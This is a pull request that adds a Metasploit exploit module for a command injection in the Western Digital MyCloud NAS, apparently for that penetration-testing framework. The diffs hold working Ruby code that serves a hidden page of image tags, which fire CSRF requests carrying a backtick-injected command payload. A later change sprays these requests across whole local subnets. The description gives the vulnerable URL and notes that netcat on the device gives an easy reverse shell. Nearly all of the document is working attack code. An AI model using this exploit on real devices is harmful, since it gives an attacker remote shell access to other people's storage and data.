### PR TITLE
Add WD MyCloud CSRF Command Injection Exploit Module

### DIFF
--- a/modules/exploits/linux/http/wdmycloud_api_csrf_exec.rb
+++ b/modules/exploits/linux/http/wdmycloud_api_csrf_exec.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'         =>
         [
-          [ 'WD MyCloud WDBCTL0040HWT 030401-219', { } ]
+          [ 'WD MyCloud WDBCTL0040HWT 03.03.02-165', { } ] # Fixed in: 03.04.01-219
         ],
       'Privileged'      => false,
       'DefaultTarget'   => 0,

--- a/modules/exploits/linux/http/wdmycloud_api_csrf_exec.rb
+++ b/modules/exploits/linux/http/wdmycloud_api_csrf_exec.rb
@@ -13,8 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
           interface of the Western Digital MyCloud NAS device. The exploit is
           written as a CSRF, since the WD MyCloud NAS will only allow API access
           from hosts on the local subnet. The exploit submits the CSRF requests
-          to RHOST, as well as wdmycloud and wdmycloud.local. This device has
-          netcat pre-installed, allowing for a simple netcat-based payload.
+          to 192.168.1.1-254 and 192.168.0.1-254, as well as wdmycloud and 
+          wdmycloud.local. This device has netcat pre-installed, allowing for a 
+          simple netcat-based payload.
       },
       'Author'          => [ 'phikshun <0x41.phikshun@gmail.com>' ],
       'License'         => MSF_LICENSE,
@@ -44,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate'  => 'Mar 19 2014'))
 
     register_options([
-      Opt::RHOST("192.168.1.100"),
       OptString.new("REDIRURL", [ false, "An URL to redirect the browser after REDIRDELAY", nil ]),
       OptInt.new("REDIRDELAY", [ true, "Milliseconds before the browser is redirected", 5000 ])
     ], self.class)
@@ -59,12 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       script = ''
     end
-
+    
+    img_tags = (1..254).map do |fourth_octet|
+      [ "<img src='http://192.168.0.#{fourth_octet}/api/1.0/rest/language_configuration?#{params}' />",
+        "<img src='http://192.168.1.#{fourth_octet}/api/1.0/rest/language_configuration?#{params}' />" ]
+    end.flatten.join("\n")
+    
     "<html><body><div style='display:none'>" +
     "<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />" +
     "<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />" +
-    "<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' /></div>" +
-    script + "</body></html>"
+    img_tags + script + "</div></body></html>"
   end
 
   def on_request_uri(cli, request)

--- a/modules/exploits/linux/http/wdmycloud_api_csrf_exec.rb
+++ b/modules/exploits/linux/http/wdmycloud_api_csrf_exec.rb
@@ -1,0 +1,75 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'WD MyCloud NAS CSRF Command Injection',
+      'Description'     => %q{
+            This module exploits a command injection vulnerability in the web
+          interface of the Western Digital MyCloud NAS device. The exploit is
+          written as a CSRF, since the WD MyCloud NAS will only allow API access
+          from hosts on the local subnet. The exploit submits the CSRF requests
+          to RHOST, as well as wdmycloud and wdmycloud.local. This device has
+          netcat pre-installed, allowing for a simple netcat-based payload.
+      },
+      'Author'          => [ 'phikshun <0x41.phikshun@gmail.com>' ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'URL', 'http://disconnected.io/2014/03/19/get-off-of-mycloud/' ],
+        ],
+      'Platform'        => [ 'unix' ],
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => true,
+      'Payload'         =>
+        {
+          'Space'       => 1024,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'netcat',
+            }
+        },
+      'Targets'         =>
+        [
+          [ 'WD MyCloud WDBCTL0040HWT 030401-219', { } ]
+        ],
+      'Privileged'      => false,
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => 'Mar 19 2014'))
+
+    register_options([
+      Opt::RHOST("192.168.1.100"),
+      OptString.new("REDIRURL", [ false, "An URL to redirect the browser after REDIRDELAY", nil ]),
+      OptInt.new("REDIRDELAY", [ true, "Milliseconds before the browser is redirected", 5000 ])
+    ], self.class)
+  end
+
+  def generate_html
+    params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")
+
+    if datastore['REDIRURL'] && datastore['REDIRDELAY']
+      script = "<script>window.setTimeout(function(){ window.location = " +
+               "'#{datastore['REDIRURL']}'; }, #{datastore['REDIRDELAY']}); </script>"
+    else
+      script = ''
+    end
+
+    "<html><body><div style='display:none'>" +
+    "<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />" +
+    "<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />" +
+    "<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' /></div>" +
+    script + "</body></html>"
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending CSRF Exploit")
+    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+    handler(cli)
+  end
+end


### PR DESCRIPTION
This exploit generates a CSRF vulnerability to trigger command injection on the Western Digital MyCloud NAS. The WD MyCloud NAS provides turn key system backup capabilities, including Time Capsule compatibility.  See http://www.wdc.com/en/products/products.aspx?id=1140 for details.

The vulnerable URL is:

/api/1.0/rest/language_configuration?language=`injection_here`&format=xml&rest_method=PUT

Since the NAS broadcasts its name via mDNS, UPnP and NETBIOS, the exploit automatically targets wdmycloud (works on Windows) and wdmycloud.local (works on Mac OS).  It also allows the user to configure the RHOST variable to target a unique hostname or IP.  The exploit itself is simple -- it uses backticks to inject linux commands into a call to the device's language selection URL.  Since the device has netcat preinstalled, getting a reverse shell is trivial.  As an added bonus, I've added JS based redirect capability.

I can post screen shots if necessary -- I do not have access to the hardware at this moment.
